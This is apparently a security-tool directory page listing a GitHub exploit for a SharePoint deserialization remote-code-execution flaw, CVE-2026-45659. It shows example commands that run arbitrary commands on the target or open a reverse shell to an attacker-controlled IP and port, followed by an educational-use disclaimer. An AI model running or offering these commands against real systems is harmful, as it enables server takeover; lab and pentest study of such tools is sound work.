Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/horkimhab/cve-2026-45659
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubhorkimhab/cve-2026-45659

CVE-2026-45659

CVE-2026-45659

View Repository
11 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Website

CVE-2026-45659

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

⚡ Simple Usage

Use this project only in safe and authorized environments such as:

  • Local virtual machines
  • Docker containers
  • Isolated lab setups
  • Authorized penetration testing environments

Example setup:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

Example usage:

root@kitploit:~
# Install dependencies
pip install -r requirements.txt

# Basic command execution
python cve-2026-45659.py -t http://sp.lab.local -u lab\\testuser -p Password123 -l "Documents" -c "whoami /all"

# Reverse shell
python cve-2026-45659.py -t http://sp.lab.local -u lab\\testuser -p Password123 -l "Documents" --reverse --ip 192.168.1.100 --port 4444

Credit or Reference

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45659
  • CVE-2026-45659-SharePoint-RCE-amnsecurity: https://github.com/amnsecurity/CVE-2026-45659-SharePoint-RCE

📚 Educational Security Research Repository

A repository for learning, testing, and researching cybersecurity concepts in controlled environments.


⚠️ Security & Legal Disclaimer

Purpose

This repository is for educational and authorized security research only.

It is designed to help users learn about:

  • Security vulnerabilities
  • Sandbox and isolation concepts
  • Secure coding and defensive practices

Authorized Use Only

Use this repository only in environments where you have permission, such as:

  • Personal labs or virtual machines
  • Docker or isolated environments
  • Authorized penetration testing
  • Cybersecurity training or academic research

Unauthorized or illegal use is strictly prohibited.


No Liability

The author and contributors are not responsible for any damage, misuse, legal issues, or losses caused by this project.

By using this repository, you agree that:

  • You are responsible for your own actions
  • You will use it legally and ethically
  • The project is provided without warranty

Ethical Use

This project is intended for:

  • Defensive security research
  • Cybersecurity education
  • Vulnerability awareness
  • Secure system and software research

Please follow responsible disclosure practices and comply with all applicable laws.


Contact

For responsible disclosure or collaboration, contact the repository maintainer through GitHub.

Download Tool